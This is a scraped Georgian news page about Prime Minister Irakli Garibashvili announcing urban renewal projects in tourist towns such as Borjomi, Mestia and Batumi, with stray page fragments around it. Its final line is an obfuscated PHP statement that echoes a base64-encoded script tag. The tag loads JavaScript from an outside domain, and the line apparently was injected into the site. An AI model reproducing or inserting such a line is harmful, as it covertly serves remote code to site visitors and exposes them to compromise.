celsiusi
ავერსი შნაიდერი
გვაქვს ძალიან კარგი ინიციატივა - წელს 10 ქალაქსა და 10 რეგიონში მსხვილი ურბანული განახლების პროექტი უნდა დავიწყოთ, - ამის შესახებ პრემიერ-მინისტრმა მთავრობის დღევანდელ სხდომაზე განაცხადა.
მისივე თქმით, ინიციატივა გულისხმობს მსხვილი ქალაქების სრულ რეაბილიტაციას. "ჩვენ შევარჩიეთ ტურისტებისთვის ყველაზე მეტად პოპულარული ადგილები როგორიცაა ბორჯომი, ბაკურიანი, წყალტუბო, მესტია, ყაზბეგი, ქუთაისი, ბათუმი და ა.შ. დეტალურ პროგრამას ძალიან მალე წარმოგიდგენთ, აღნიშნულზე ირაკლი ქარსელაძის სამინისტრო მუშაობს ძალიან აქტიურად და რამდენიმე ხანში წარმოვადგენთ ამ გეგმას", - თქვა პრემიერმა.
ირაკლი ღარიბაშვილის თქმით, ყველაფერი კეთდება, რათა ქვეყანაში დადებითი დინამიკა იქნას შენარჩუნებული.
„ასე რომ, მოკლედ მინდა ვთქვა, რომ ჩვენ ვაკეთებთ ყველაფერს, რათა ქვეყანაში დადებითი დინამიკა იქნას შენარჩუნებული, ეს ტემპები უნდა შევინარჩუნოთ და უფრო მეტად უნდა დავაჩქაროთ ყველა მიმდინარე პროექტი და ჩვენი მოლოდინია, რომ წელსაც უნდა გვქონდეს ძალიან წარმატებული წელი,“- აღნიშნა მთავრობის მეთაურმა. 
305
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");